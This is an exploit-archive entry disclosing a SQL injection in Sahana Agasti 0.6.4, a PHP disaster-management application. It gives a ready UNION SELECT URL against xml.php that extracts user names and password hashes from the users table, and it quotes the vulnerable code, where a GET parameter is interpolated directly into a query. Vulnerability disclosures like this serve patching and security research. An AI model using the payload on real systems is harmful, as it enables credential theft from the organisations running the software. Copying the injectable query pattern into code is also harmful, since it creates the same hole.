Sahana Agasti <= 0.6.4 SQL Injection Vulnerability

2011-01-02T00:00:00
ID 1337DAY-ID-15269
Type zdt
Reporter dun
Modified 2011-01-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ################################################################
#  [ Sahana Agasti <= 0.6.4 ]  SQL Injection Vulnerability     #
################################################################
#
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.
#          Based a long-term preparedness for disaster management..."
#
# Script site: http://www.sahanafoundation.org/
# Download: https://launchpad.net/sahana-agasti/
#
# [SQL] Vuln:
# http://site.com/agasti/sahana-0.6.4/www/xml.php?act=add_loc&sel=1/**/UNION/**/SELECT/**/null,concat(CHAR(60,66,82,62),concat_ws(char(58),user_name,password)),null/**/FROM/**/users
#   
#   
# Bug: ./sahana-0.6.4/www/xml.php (lines: 17-21, 200-223)
#
# ...
# $act=$_GET{"act"};                                                          //
#
# if($act=='add_loc')                                                         // (1)
# {
#         _shn_get_level_location();                                          //
# ...
#
# function _shn_get_level_location(){
#         require_once('../3rd/adodb/adodb.inc.php');
#         require_once('../conf/sysconf.inc.php');
#         //Make the connection to $global['db']
#         $db = NewADOConnection($conf['db_engine']);
#        $db ->Connect($conf['db_host'].($conf['db_port']?':'.$conf['db_port']:''),$conf['db_user'],$conf['db_pass'],$conf['db_name']);
#
#
#         $level=$_GET{"sel"};                                                // (2)
#         if($level==1){
#                 echo "none,";
#         }
#         $q = "SELECT location.name,location.loc_uuid,parent_id FROM location WHERE location.opt_location_type={$level}";          // (3) SQL
#         $res_child=$db->Execute($q);
#         if($res_child->EOF)
#         return;
#         while(!$res_child->EOF){
#                 $res=$res.",".$res_child->fields[1];
#                 $res=$res.",".$res_child->fields[0];
#                $res_child->MoveNext();
#        }
#         echo $res;                                                          // (4)
# }
# ... 
#
#
###############################################



#  0day.today [2018-02-17]  #